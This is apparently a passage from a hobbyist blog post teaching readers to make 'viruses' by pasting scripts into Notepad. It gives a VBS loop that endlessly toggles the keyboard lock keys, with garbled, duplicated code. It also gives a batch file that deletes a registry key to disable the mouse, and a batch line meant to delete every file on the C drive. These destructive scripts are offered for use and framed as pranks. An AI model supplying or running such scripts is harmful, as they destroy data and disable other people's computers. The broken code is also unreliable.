- To do this open Notepad and copy code
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
- Save it with an extension .vbs (eg: your name.vbs)
- In order to stop it just go the Task manager--> Process-->search wscript.exe -->End Process
2. Disable Mouse By Creating a Virus (harmful)
- Copy below code and paste into Notepad
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
- Save it with an extension .bat
3. Format C Drive by Creating a Virus
- Think, Think 100 times before do it **Extremly Harmful.
@ECHO OFF DEL C:\ *.*|Y
- Save this file with an extension .bat
- Recommend as highly danger to your system
See Also: How To Make Your Computer Welcome You - Make Computer Speak to You
{ 0 comments... read them below or add one }
Post a Comment